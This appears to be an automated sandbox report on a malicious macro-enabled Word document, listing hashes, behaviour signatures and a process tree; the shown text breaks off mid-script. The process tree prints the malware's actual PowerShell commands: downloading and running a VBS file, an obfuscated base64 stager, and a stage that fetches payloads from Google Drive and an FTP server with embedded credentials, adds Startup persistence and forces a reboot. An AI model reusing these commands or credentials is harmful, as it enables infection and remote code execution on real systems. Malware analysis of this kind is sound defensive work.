Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 05:29

General

  • Target

    ca2d1cdf7ed424c2d7cf0ef6acb4a6d697a2316b8b0bdab73b4f3450eda994f4.docm

  • Size

    112KB

  • MD5

    916af4bbb620fc412b71343c14bc65da

  • SHA1

    13972c6c8f8d121d90fd53ec6dfb634d0e382446

  • SHA256

    ca2d1cdf7ed424c2d7cf0ef6acb4a6d697a2316b8b0bdab73b4f3450eda994f4

  • SHA512

    9d4f71bbaefb57dffd57d603688732e32a811ffc3193c055f870402d5320745d2f8d48937889d51c7f4aa8f7210e60da44d46962a025e3594df11a241b97ac45

  • SSDEEP

    1536:vkcgH+VIU5s7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBh/0pxG:vVgH+mU5ClwH9r0l77AnsSmy/Bh8pxG

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ca2d1cdf7ed424c2d7cf0ef6acb4a6d697a2316b8b0bdab73b4f3450eda994f4.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/JYD4emud/IlFYYjVx.17ffb772e0a20043527d718e22ce63f3 -o test.vbs; explorer.exe test.vbs
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" test.vbs
        3⤵
          PID:2560
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4400,i,3239535018877284530,3457823197501312703,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
      1⤵
        PID:2800
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2568
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$YgmZb = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉEQШḆЉTwB1ШḆЉDEШḆЉagBaШḆЉGwШḆЉcШḆЉШḆЉvШḆЉGYШḆЉMQBmШḆЉDkШḆЉMQBlШḆЉDШḆЉШḆЉOQШḆЉtШḆЉGQШḆЉMШḆЉBmШḆЉGQШḆЉLQШḆЉ0ШḆЉDUШḆЉOШḆЉШḆЉwШḆЉC0ШḆЉOQШḆЉ5ШḆЉGQШḆЉNwШḆЉtШḆЉDUШḆЉYwBiШḆЉGUШḆЉMwBhШḆЉDQШḆЉZШḆЉBiШḆЉGUШḆЉZgШḆЉ1ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgBhШḆЉGcШḆЉbwByШḆЉGEШḆЉLgB2ШḆЉGEШḆЉaQШḆЉuШḆЉDIШḆЉOQШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDIШḆЉQQШḆЉlШḆЉDMШḆЉRШḆЉBVШḆЉFQШḆЉRgШḆЉtШḆЉDgШḆЉJQШḆЉyШḆЉDcШḆЉJQШḆЉyШḆЉDcШḆЉYQBnШḆЉG8ШḆЉcgBhШḆЉC4ШḆЉdgBhШḆЉGkШḆЉLgШḆЉyШḆЉDkШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJgBzШḆЉG8ШḆЉdQByШḆЉGMШḆЉZQШḆЉ9ШḆЉGQШḆЉbwB3ШḆЉG4ШḆЉbШḆЉBvШḆЉGEШḆЉZШḆЉШḆЉmШḆЉHYШḆЉPQШḆЉlШḆЉDIШḆЉMgШḆЉ0ШḆЉDgШḆЉYwBlШḆЉGQШḆЉMgШḆЉ5ШḆЉDUШḆЉZQШḆЉyШḆЉGIШḆЉZgШḆЉ5ШḆЉGYШḆЉNQBlШḆЉGUШḆЉYgBhШḆЉGYШḆЉMgШḆЉ2ШḆЉGYШḆЉZQШḆЉzШḆЉDgШḆЉMgBiШḆЉDMШḆЉZgШḆЉ0ШḆЉGQШḆЉJQШḆЉyШḆЉDIШḆЉJwШḆЉgШḆЉCgШḆЉIШḆЉBdШḆЉF0ШḆЉWwB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwBbШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGwШḆЉbШḆЉB1ШḆЉG4ШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZQBrШḆЉG8ШḆЉdgBuШḆЉEkШḆЉLgШḆЉpШḆЉCШḆЉШḆЉJwBJШḆЉFYШḆЉRgByШḆЉHШḆЉШḆЉJwШḆЉgШḆЉCgШḆЉZШḆЉBvШḆЉGgШḆЉdШḆЉBlШḆЉE0ШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCcШḆЉMQBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉLgШḆЉzШḆЉHkШḆЉcgBhШḆЉHIШḆЉYgBpШḆЉEwШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉCcШḆЉKШḆЉBlШḆЉHШḆЉШḆЉeQBUШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉgШḆЉHgШḆЉbQB6ШḆЉFgШḆЉeШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBkШḆЉGEШḆЉbwBMШḆЉC4ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉdШḆЉBuШḆЉGUШḆЉcgByШḆЉHUШḆЉQwШḆЉ6ШḆЉDoШḆЉXQBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉBwШḆЉHШḆЉШḆЉQQШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwШḆЉpШḆЉCШḆЉШḆЉKQШḆЉgШḆЉCcШḆЉQQШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉkyE6ШḆЉJMhJwШḆЉgШḆЉCgШḆЉZQBjШḆЉGEШḆЉbШḆЉBwШḆЉGUШḆЉUgШḆЉuШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgByШḆЉEEШḆЉVwBjШḆЉG0ШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉFMШḆЉegBDШḆЉEIШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgByШḆЉEEШḆЉVwBjШḆЉG0ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉByШḆЉEEШḆЉVwBjШḆЉG0ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉKШḆЉBlШḆЉHMШḆЉbwBwШḆЉHMШḆЉaQBkШḆЉC4ШḆЉcgBBШḆЉFcШḆЉYwBtШḆЉCQШḆЉOwШḆЉpШḆЉCШḆЉШḆЉJwB0ШḆЉHgШḆЉdШḆЉШḆЉuШḆЉDEШḆЉMШḆЉBMШḆЉEwШḆЉRШḆЉШḆЉvШḆЉDEШḆЉMШḆЉШḆЉvШḆЉHIШḆЉZQB0ШḆЉHШḆЉШḆЉeQByШḆЉGMШḆЉcШḆЉBVШḆЉC8ШḆЉcgBiШḆЉC4ШḆЉbQBvШḆЉGMШḆЉLgB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC4ШḆЉcШḆЉB0ШḆЉGYШḆЉQШḆЉШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLwШḆЉvШḆЉDoШḆЉcШḆЉB0ШḆЉGYШḆЉJwШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉcgBBШḆЉFcШḆЉYwBtШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBTШḆЉHoШḆЉQwBCШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉHIШḆЉQQBXШḆЉGMШḆЉbQШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgByШḆЉEEШḆЉVwBjШḆЉG0ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉByШḆЉEEШḆЉVwBjШḆЉG0ШḆЉJШḆЉШḆЉ7ШḆЉGcШḆЉUwB6ШḆЉEMШḆЉQgBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉHШḆЉШḆЉSШḆЉB2ШḆЉGwШḆЉTwШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBwШḆЉEgШḆЉdgBsШḆЉE8ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉEgШḆЉdgBsШḆЉE8ШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBtAGIAdgB6AEIAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABtAGIAdgB6AEIAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAUABLAGoAbQBUACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAFAASwBqAG0AVAAkACAAOwA=';$VveJR = $YgmZb.replace('ШḆЉ' , 'A') ;$SBEuI = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $VveJR ) ); $SBEuI = $SBEuI[-1..-$SBEuI.Length] -join '';$SBEuI = $SBEuI.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\test.vbs');powershell $SBEuI
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:624
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TmjKP = $host.Version.Major.Equals(2) ;if ($TmjKP) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$Bzvbm = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($Bzvbm) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OlvHp = (New-Object Net.WebClient);$OlvHp.Encoding = [System.Text.Encoding]::UTF8;$OlvHp.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mcWAr = (New-Object Net.WebClient);$mcWAr.Encoding = [System.Text.Encoding]::UTF8;$mcWAr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $mcWAr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$mcWAr.dispose();$mcWAr = (New-Object Net.WebClient);$mcWAr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mcWAr.DownloadString( $lBCzSg );$hzwje = 